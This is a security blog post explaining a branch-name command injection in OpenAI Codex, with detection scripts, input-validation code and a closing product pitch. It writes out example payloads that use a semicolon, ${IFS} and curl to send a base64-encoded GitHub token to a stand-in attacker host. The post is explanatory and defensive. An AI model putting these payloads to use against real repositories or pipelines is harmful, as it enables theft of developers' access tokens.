DEV Community

Toni Antunovic

Posted on • Originally published at lucidshark.com

When a Git Branch Name Becomes a Weapon: The Codex Command Injection That Could Steal Your GitHub Token



In February 2026, BeyondTrust Phantom Labs quietly disclosed a command injection vulnerability in OpenAI Codex. The attack vector: a maliciously crafted Git branch name.

No phishing. No social engineering. No malware. A developer working on a shared repository, or any automated CI process that cloned from one, could have their GitHub access token silently exfiltrated to an attacker's server by checking out a specially named branch.

The vulnerability was patched on February 5, 2026, but coverage in the security community crested only recently. The attack pattern it reveals is not going away.

What OpenAI Codex Does

Codex is OpenAI's AI coding agent, embedded in the ChatGPT web UI and available as a CLI, SDK, and IDE extension. When you create a Codex task, the agent spins up an isolated container, clones your repository, and begins executing tools and writing code. The container setup process passes your task configuration, including the target branch name, through an HTTP request to the Codex backend. The backend uses these values to initialize the environment. This is where the injection occurs.

The Attack

The branch parameter in the Codex task creation request was passed to a shell command without sanitization. If you could control the branch name that Codex processed, you could inject arbitrary shell commands into the environment setup phase.

Here is what a malicious branch name looks like:

main; curl -s https://attacker.example.com/collect?t=$(echo $GITHUB_TOKEN | base64) #

The semicolon terminates the legitimate git checkout command. The curl command executes next, reading the $GITHUB_TOKEN environment variable (which Codex had injected for repository access), base64-encoding it, and sending it to an attacker-controlled server. The hash sign comments out any trailing content.
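The tokenization that makes this work can be illustrated with Python's standard `shlex` module, which mimics shell lexing. This is purely an illustration of shell syntax, not of how Codex processed the string; `punctuation_chars=True` makes operators like `;` and `|` stand-alone tokens, and shlex's default `#` commenter mirrors the shell's comment handling:

```python
import shlex

# A simplified version of the malicious branch name from above.
payload = "main; curl -s https://attacker.example.com/collect trailing junk # ignored"

lex = shlex.shlex(payload, punctuation_chars=True)
lex.whitespace_split = True
tokens = list(lex)
print(tokens)
# 'main' and ';' are separate tokens: the shell sees the end of one
# command and the start of another. Everything after '#' is discarded.
```

The key observation: nothing about the string `main` constrains what follows it once a `;` reaches a shell interpreter.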

But there is a complication: that branch name would fail Git's ref validation. Semicolons are, perhaps surprisingly, legal in ref names, but spaces are not, so an attacker cannot push a branch with that name to a remote repository.

The solution involves Unicode.

The Unicode Trick

Git enforces constraints on ASCII control characters and certain special characters in branch names, but it does not validate against the entire Unicode character set. Specifically, Unicode Ideographic Space (U+3000) is visually indistinguishable from a regular space in most terminals and editors, passes Git's branch name validation, and is treated as whitespace by many shell parsers.

A branch name that appears completely normal in any editor or terminal could contain a hidden injection payload using Unicode lookalikes and the Internal Field Separator variable ${IFS} to replace spaces:

main; curl${IFS}-s${IFS}https://attacker.example.com/collect?t=$(echo${IFS}$GITHUB_TOKEN|base64)${IFS}#
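The `${IFS}` trick is easy to verify in any POSIX shell. The sketch below drives `sh` from Python (so it requires a POSIX `sh` on the PATH) and shows that an unquoted `${IFS}` expansion produces a word boundary with no literal space in the source string:

```python
import subprocess

# ${IFS} (the Internal Field Separator) defaults to space/tab/newline.
# Unquoted, its expansion undergoes field splitting, so it acts as a
# word boundary -- which is exactly what the payload above exploits.
result = subprocess.run(
    ["sh", "-c", "echo${IFS}hidden${IFS}payload"],
    capture_output=True,
    text=True,
)
print(result.stdout.strip())  # → hidden payload
```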

A developer reviewing pull request branch names, or a CI engineer scanning repository branch lists, would see nothing unusual. The injection payload is visually hidden.

Warning: Visual Inspection Cannot Detect This Attack. Unicode Ideographic Space (U+3000) renders identically to ASCII space in virtually all terminals, code editors, and web interfaces. Branch names containing injection payloads using this technique cannot be distinguished from legitimate branch names by visual review alone. Automated validation is required.
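The indistinguishability is easy to confirm with the standard `unicodedata` module. The two strings below render identically in most fonts, yet only the second would survive Git's ref validation (ASCII space is forbidden in ref names, U+3000 is not):

```python
import unicodedata

legit = "release v2"            # ASCII space (U+0020) -- invalid as a branch name
spoofed = "release\u3000v2"     # Ideographic Space (U+3000) -- valid, looks identical

print(legit == spoofed)         # False, despite rendering alike
for ch in spoofed:
    if ord(ch) > 127:
        # The Unicode name and category confirm a whitespace lookalike
        print(f"U+{ord(ch):04X} {unicodedata.name(ch)} ({unicodedata.category(ch)})")
```

The same `ord(c) > 127` test is what the detection script later in this article relies on.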

What the Attacker Gets

The GITHUB_TOKEN variable available inside a Codex container is a GitHub User Access Token with the permissions granted to the user who created the task. Depending on the user's access level, this token can provide:

  • Read and write access to all repositories the user has access to
  • Ability to create and approve pull requests
  • Access to organization secrets in some configurations
  • Ability to trigger CI/CD workflows

A stolen GitHub token is not a read-only credential. In most developer environments, it is an effective admin key to the codebase. The blast radius extends further if the compromised user has access to organizational repositories, if the token is used as a service account credential, or if the repository contains additional secrets that the attacker can now read.
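One quick way to gauge that blast radius for a classic personal access token is the `X-OAuth-Scopes` response header GitHub returns on authenticated API calls (fine-grained tokens do not report scopes this way). A minimal sketch, using only the standard library; the helper names are ours, the endpoint and header are GitHub's:

```python
import urllib.request

def parse_scopes(header_value: str) -> list[str]:
    """Split GitHub's comma-separated X-OAuth-Scopes header value."""
    return [s.strip() for s in header_value.split(",") if s.strip()]

def token_scopes(token: str) -> list[str]:
    # Any authenticated call returns the header; /user is the simplest.
    req = urllib.request.Request(
        "https://api.github.com/user",
        headers={"Authorization": f"Bearer {token}"},
    )
    with urllib.request.urlopen(req) as resp:
        return parse_scopes(resp.headers.get("X-OAuth-Scopes", ""))

# e.g. token_scopes(os.environ["GITHUB_TOKEN"]) might return
# ['repo', 'workflow'] -- each scope is attacker capability if stolen.
```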

Why AI Coding Tools Are Particularly Vulnerable to This Pattern

Command injection is not a new vulnerability class. Unsanitized input flowing into a shell command is a well-understood failure mode. What makes this instance significant is where it appears: in an AI coding tool, built by a company that arguably set the standard for responsible AI deployment.

AI coding tools have a specific property that makes injection vulnerabilities more dangerous than in traditional software: they operate at the boundary between user-controlled input and privileged execution environments.

A traditional code editor reads files and displays them. An AI coding agent reads files, understands them, executes tools against them, and makes authenticated API calls on the user's behalf. The gap between "read this file" and "authenticate to your cloud provider and execute commands" is where the expanded attack surface lives.

Every piece of external data that flows into an AI coding agent is potential injection material: repository contents, commit messages, branch names, issue titles, dependency names, code comments, environment variable names. In a traditional tool, these are passive data. In an agentic tool, they are potential commands.

Warning: The Same Pattern Appears Across Tools. The branch-name injection in Codex is specific to one tool, but the underlying pattern (external repository data flowing unsanitized into privileged shell contexts) exists across AI coding tools. Any tool that clones repositories and executes shell commands in the same process, passing user-controlled strings to shell invocations without sanitization, may have similar exposure. The Codex disclosure should prompt audits of comparable tools, not just a single patch.

Detection: What to Look For

If you used Codex between its launch and February 5, 2026, particularly with shared or forked repositories, audit your GitHub token activity.

Check GitHub's token activity log for unexpected API calls, especially outbound calls during CI runs:

# Audit recent GitHub token activity
gh api /repos/{owner}/{repo}/events --paginate | \
  jq '.[] | select(.type == "PushEvent" or .type == "CreateEvent") | {actor: .actor.login, type: .type, created_at: .created_at}'

# Review authorized OAuth apps and active tokens in the GitHub UI:
#   https://github.com/settings/applications
#   https://github.com/settings/tokens

Check for branch names in your repository history that contain Unicode characters outside the ASCII range:

# Find branches with non-ASCII characters in their names
git branch -a | python3 -c "
import sys
for line in sys.stdin:
    name = line.strip().lstrip('* ')
    if any(ord(c) > 127 for c in name):
        print(f'SUSPICIOUS: {name!r}')
"

Mitigation

Rotate your GitHub tokens. If you used Codex on shared repositories before February 5, 2026, treat any GitHub access tokens used during that period as potentially compromised. Generate new tokens and revoke the old ones.

Audit repository branch names. Run the script above against any repositories that Codex accessed. Look specifically for branch names containing Unicode Ideographic Space (U+3000) or other non-ASCII characters that serve no legitimate purpose.

Restrict token permissions. GitHub's fine-grained personal access tokens allow per-repository, per-permission scoping. If you use AI coding tools that require repository access, create dedicated tokens with the minimum permissions necessary, scoped to only the repositories the tool needs.

Validate inputs at the tool level. For teams building internal tooling or CI pipelines that pass branch names to shell commands, validate that branch names contain only expected characters before passing them to any shell context:

import re
import subprocess

def validate_branch_name(branch: str) -> bool:
    # Allow only ASCII alphanumerics, hyphens, slashes, underscores, and dots;
    # anything containing characters outside this set is rejected, as is a
    # leading hyphen, which git could otherwise parse as an option.
    if branch.startswith('-'):
        return False
    return bool(re.match(r'^[a-zA-Z0-9._\-/]+$', branch))

def safe_checkout(branch: str):
    if not validate_branch_name(branch):
        raise ValueError(f"Branch name contains invalid characters: {branch!r}")
    # Pass as argument list, never as a shell string
    subprocess.run(['git', 'checkout', branch], check=True)

Why Subprocess Args Are Safer Than Shell Strings. The safest mitigation for shell injection is to pass arguments as a list to subprocess rather than as a shell string. When you call subprocess.run(['git', 'checkout', branch]), the branch name is passed directly to the process as an argument, never interpreted by a shell. No amount of semicolons, Unicode tricks, or variable expansions can escape argument list boundaries. Shell strings (subprocess.run(f"git checkout {branch}", shell=True)) pass the entire string through a shell interpreter and are vulnerable to injection by design.
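The boundary is easy to demonstrate. The sketch below passes the malicious string as a list element to a harmless child process (a Python interpreter that just echoes its argv back), so nothing dangerous runs, and shows the payload arriving as one inert argument:

```python
import subprocess
import sys

payload = "main; echo INJECTED #"

# Argument-list form: the child receives the payload as a single argv
# entry. The ';' and '#' are just bytes in a string, never shell syntax.
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", payload],
    capture_output=True,
    text=True,
)
print(result.stdout.strip() == payload)  # → True: delivered verbatim, uninterpreted
```

Had the same payload been interpolated into a `shell=True` string, the `echo INJECTED` would have executed as its own command.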

The Broader Lesson for AI Coding Workflows

The Codex vulnerability is fixed. But it is a preview of a vulnerability class that will recur across AI coding tools as long as these tools accept external user-controlled data, execute privileged operations in the same environment, and treat user-controlled input as implicitly trusted.

The traditional security model: distrust external input, sanitize before use, separate data from execution. This applies to AI coding tools the same way it applies to web applications. The tooling ecosystem around AI coding agents is young enough that these principles have not yet been universally applied.

Local-first tools have a structural advantage here: when quality checks and code analysis run as local MCP tools rather than in cloud-provisioned containers, the execution environment is your machine, with your access controls, your network policies, and your visibility. A command injection in a local process produces noise you can see. A command injection in a cloud container exfiltrates data before you know anything happened.


Harden Your AI Coding Pipeline with LucidShark

LucidShark runs SAST, SCA, linting, and dependency analysis locally as MCP tools inside Claude Code. Your code never leaves your machine for quality analysis, and the quality gate layer has no cloud authentication tokens to steal. Install with:

curl -fsSL https://raw.githubusercontent.com/toniantunovic/lucidshark/main/install.sh | bash

Local-first quality gates are not just about privacy. They are about keeping the attack surface of your development workflow contained to infrastructure you control.
